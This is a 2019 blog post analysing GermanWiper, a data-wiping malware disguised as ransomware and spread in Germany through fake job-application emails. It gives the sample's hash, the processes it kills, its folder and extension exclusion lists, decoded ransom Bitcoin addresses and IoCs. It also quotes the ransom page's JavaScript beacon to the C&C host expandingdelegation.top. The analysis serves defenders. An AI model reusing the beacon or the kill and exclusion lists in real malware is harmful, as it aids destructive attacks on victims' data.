Sunday 29 September 2019

GermanWiper: One More Wiper Pretending to Be Ransomware


[Authors: Viktoria Taran, Alexander Adamov]

GermanWiper was first seen on the BleepingComputer forum on July 30, 2019. After analysis, it turned out that the malware is rather a wiper than ransomware. Interestingly, GermanWiper managed to raise $9,000 almost reaching the result of $10,500 (4.13528947 BTC) earned by another wiper called NotPetya in June 2017. Let us take a close look at the ransomware to find out the installation process, communication details, and wiping details.

Static Analysis

The ransomware file is PE32 executable for MS Windows. It is 2053632 bytes in size. The payload code is written and compiled in Borland Delphi. In addition, it employs the Enigma protector, which code is written in Microsoft Visual C++. According to the compilation timestamp, the binary was compiled on July 31, 2019.


The wiper's code was compiled in Borland Delphi.


SHA-256: 21c756af39c6a502f7ec173f0643389806912efc1947a93bd6618fe2dae58e39


Attack Vector

GermanWiper is being spread over Germany as emails that include the rogueLena Kretschmer's resume. Launching one of the .lnk file ‘Bewerbung-Lena-Kretschmer.exe’ in the attachment leads to downloading the malware from ‘expandingdelegation.top’ web page. According to BleepingComputer, there is a similarity in delivery methods between GermanWiper and recent Sodinokibi ransomware campaign in which attackers distributed a fake email allegedly from BSI, the German Federal Office for Information Security.

The whole infection chain can be seen at app.any.run sandbox.

Installation

Once executed, the ransomware terminates the next processes to release locked files with user’s data:


notepad.exe
dbeng50.exe
sqbcoreservice.exe
encsvc.exe
mydesktopservice.exe
isqlplussvc.exe
agntsvc.exe
sql.exe
sqld.exe
mysql.exe
mysqld.exe
oracle.exe



After that, it scans for the system folders, files, and file extensions to avoid their encryption which can lead to destroying the system.


windows
recycle.bin
mozilla
google
boot
application data
appdata
program files
program files (x86)
programme
programme (x86)
programdata
perflogs
intel
msocache
system volume information
autorun.inf
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
bootmgr
bootnxt
thumbs.db


.386
.adv
.ADV
.ani
.ANI
.bat
.BAT
.bin
.BIN
.cab
.CAB
.cmd
.CMD
.com
.COM
.cpl
.CPL
.cur
.CUR
.deskthemepack
.DESKTHEMEPACK
.diagcab
.DIAGCAB
.diagcfg
.DIAGCFG
.diagpkg
.DIAGPKG
.dll
.DLL
.drv
.DRV
.exe
.EXE
.hlp
.HLP
.icl
.ICL
.icns
.ICNS
.ico
.ICO
.ics
.ICS
.idx
.IDX
.ldf
.lnk
.LNK
.mod
.MOD
.mpa
.MPA
.msc
.MSC
msp
.MSP
.msstyles
.MSSTYLES
.msu
.MSU
.nls
.NLS
.nomedia
.NOMEDIA
.ocx
.OCX
.prf
.PRF
.psl
.PSL
.rom
.ROM
.rtp
.RTP
.scr
.SCR
.shs
.SHS
.spl
.SPL
.sys
.SYS
.theme
.THEME
.themepack
.THEMEPACK
.wpx
.WPX
.lock
.LOCK
.hta
.HTA
.msi
.MSI




Wiping data

GermanWiper overwrites the file content with zero values and adds five random generated characters as file extension to the blank file.


Ransom note

After file wiping, it creates the .html file with a ransom note. The content of this file is as follows:

The Bitcoin account is also mentioned:

It is said that the Bitcoin account is generated individually. During the dynamic analysis, it was discovered that the wiper has a list of Bitcoin addresses. One of the addresses is chosen randomly for each victim. This list is located in the '.data' section and Base64 encoded.


MUtqQlV2TjRHZmlwaTNiR211QVBEY0pFcXg0OE54NW00aQ==
MTdCSlI5OEczYnB5Y2dvaWNWVldITG10MW43andDM0hUaw==
MTRYaHdWM2lCTWNMRThxVVJ0azRxMlRSNTNvTVNOZ1pIWg==
MTd6R2NxS2ppODRzWWc2WHhlZkxGdmtab3VITUtRZlNyYg==
MUxSTUZLcFNLaHJvYlZKYTF1bzVWN3BuWW5FVjdTOGhaRQ==
MTM1dWcxZGlFa2FHbVRhSGg0dlAxa0xMZ3N3UlZtWmJLdw==
MU5YWmc1OUJ6V1NleHREdXZzcGJDSjZOUnFIVDRUN2piTQ==
MTlzZDg2ZHVUaDd2a1lVd01ESmlyUDFGNTEzVHZ3bzdmdg==
MUpqa2JmakRzaTFVcXFCZ2NHdHNNZFplZkZNY1Z1a3dWYQ==
MVB5WjZ5UWRuTXBWbjVvOVNmZGFQRXpBSDEzN1lzOUtIbg==
MUNRamFLSmQ4WUt1dnpqaGp0Q0t5OFFHUDlDWTRYNlh5Yw==
MUoxTUJiZ05vQjlwSlhoelpzNkR0bnBnSFB6YWVxQ3gyeA==
MU1SdnI5YkRCS2I4TGNjdGViTTdScVhpOFhpaXYzNWZVdA==
MURiQVhmRlkxc0NxZWE0V2UyOHRkOGUzRlVHaDFNdktiVA==
MTZDcTJNcFgxTERNWEVhM2VHdVEzRkdXQzNrTm9vd3pqZw==
MUpLTjF1ejZCYVdVd2Z0b1BTYWg1Um52RDlhVGppbWtaZQ==
MUh1Z05OcjcyTUhBZDUzUzN5Z0h3SldBeGk2NTV0cEJxYQ==
MTd2SDFZVDYzalJUYXZOUVJHR3NQNDl4anpadFpzeE5SRg==
MUZaaFRCTFpNUlFtczVxOGg0aUhaQVlkRXBncjZkaHB3Mg==
MUVKbllGbU5tVmVvenJGakJ5elFtV0JNYkNiNnNqOEtOaA==
MTNpdjZhVWM4b0VCZzlSOU1GUkV3dlRSVGplY3kyVEJYWQ==
MUUzczZTM1lVZmFkWlAyN1p0d3RQRU5iU3pWNE1yM2t2Ng==
MTh0bm1EU3ZMYjVzeHlWYWlkM0s5WWRFVmZUOVRIVE1mbw==
MUVoNEMxUm9kb2lGRU0zRzdab3pMb2pOU05HUExoOFhvMQ==
MUZrQ1prbTc0ekVRM1VOQ1NjQndVenV4WWJiV0gxNWg1eg==
MTlQRUtUQ28xSjJRaDFqQ0h4bnNYajRyQUF2dm5veXJEQg==
MUZ0NDVhVzhiM0hlb0pHZTlObUp6OEgzSHU3TnB3ZEh6WQ==
MURBa1YzbjNRWlp0WVpBbUdERkNReWFoN1lUQ1JETm1IMQ==
MTljd3JqVjJGTTNmdzRCcUJ3bnNCaTloRHdNd1ViSnl5OA==
MTNBc2RYa2I3TEcyYUp6cm9adFpwQ3NxYmh5aFpncnB3Yw==
MTY3a1ZQMWN0bnc0OGVFTTk3Wkhid1RUTEVVYUVvSHRmTg==
MUE4UngxUEh5WXE0eEpOU29Ebmt1YTlyc1FhVnVMN0tTVQ==
MUQ4VEUyTFJEalJVM2I2MTQzTFI0R1hXSmJ2aG56b2lLdQ==
MUdKZmRpdTJBRVFBOU5zRnlLeXB4N1lNZm9IRlppN0t6Ug==
MUhrMnVBd29XNno1UWRydHNzS1hCUTlkNlZUdm44blBEOA==
MTlENGlVcVlZZDF5M0huMjk1eWZzYWNYVXlrV3dxWmFvdg==

After decoding the list contains the following Bitcoin addresses:


+1KjBUvN4Gfipi3bGmuAPDcJEqx48Nx5m4i
17BJR98G3bpycgoicVVWHLmt1n7jwC3HTk
14XhwV3iBMcLE8qURtk4q2TR53oMSNgZHZ
+17zGcqKji84sYg6XxefLFvkZouHMKQfSrb
1LRMFKpSKhrobVJa1uo5V7pnYnEV7S8hZE
135ug1diEkaGmTaHh4vP1kLLgswRVmZbKw
1NXZg59BzWSextDuvspbCJ6NRqHT4T7jbM
19sd86duTh7vkYUwMDJirP1F513Tvwo7f
+1JjkbfjDsi1UqqBgcGtsMdZefFMcVukwVa
1PyZ6yQdnMpVn5o9SfdaPEzAH137Ys9KHn
1CQjaKJd8YKuvzjhjtCKy8QGP9CY4X6Xyc
1J1MBbgNoB9pJXhzZs6DtnpgHPzaeqCx2x
1MRvr9bDBKb8LcctebM7RqXi8Xiiv35fUt
1DbAXfFY1sCqea4We28td8e3FUGh1MvKbT
16Cq2MpX1LDMXEa3eGuQ3FGWC3kNoowzjg
1JKN1uz6BaWUwftoPSah5RnvD9aTjimkZe
1FkCZkm74zEQ3UNCScBwUzuxYbbWH15h5z
1HugNNr72MHAd53S3ygHwJWAxi655tpBqa
17vH1YT63jRTavNQRGGsP49xjzZtZsxNRF
+1FZhTBLZMRQms5q8h4iHZAYdEpgr6dhpw2
1EJnYFmNmVeozrFjByzQmWBMbCb6sj8KNh
13iv6aUc8oEBg9R9MFREwvTRTjecy2TBXY
1E3s6S3YUfadZP27ZtwtPENbSzV4Mr3kv6
18tnmDSvLb5sxyVaid3K9YdEVfT9THTMfo
1Eh4C1RodoiFEM3G7ZozLojNSNGPLh8Xo1
19PEKTCo1J2Qh1jCHxnsXj4rAAvvnoyrDB
1Ft45aW8b3HeoJGe9NmJz8H3Hu7NpwdHzY
1DAkV3n3QZZtYZAmGDFCQyah7YTCRDNmH1
+19cwrjV2FM3fw4BqBwnsBi9hDwMwUbJyy8
13AsdXkb7LG2aJzroZtZpCsqbhyhZgrpwc
167kVP1ctnw48eEM97ZHbwTTLEUaEoHtfN
1A8Rx1PHyYq4xJNSoDnkua9rsQaVuL7KSU
1D8TE2LRDjRU3b6143LR4GXWJbvhnzoiKu
+1GJfdiu2AEQA9NsFyKypx7YMfoHFZi7KzR
1Hk2uAwoW6z5QdrtssKXBQ9d6VTvn8nPD8
19D4iUqYYd1y3Hn295yfsacXUykWwqZaov


For example, the first BTC address in the list received 0.150389 BTC ($1500) on August 1, 2019.


GermanWiper creates a jpg file and changes a desktop photo to that which tells to open the XXXXX_Entschluesselungs_Anleitung.html.


Network communications

At the end of the HTML source code, the JavaScript code is located. It implements communication with the C&C server 'expandingdelegation.top'.
When the HTML page is opened, the JavaScript code is executed.


“<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script><script>$( document ).ready(function() {$.get("hxxp://expandingdelegation.top/majis/c.php?status=start&ext=O6qkv&BRA=MURBa1YzbjNRWlp0WVpBbUdERkNReWFoN1lUQ1JETm1IMQ==&FCF=13257&FCS=699675323",function(data){});});</script></html>”

Total wiping

Finally, the cmd script deletes volume shadow copies and disable Windows automatic startup repair.

Conclusion

This is not the first case when, intentionally or due to a mistake, the ransomware was turned into a wiper but In this case targeting users in Germany. The case of GermanWiper shows that before paying the ransom, it makes sense for a victim first to contact cybersecurity laboratories or Police to verify if decryption is possible at all.

IoCs

expandingdelegation.top

SHA-256: 21c756af39c6a502f7ec173f0643389806912efc1947a93bd6618fe2dae58e39



No comments:

Post a Comment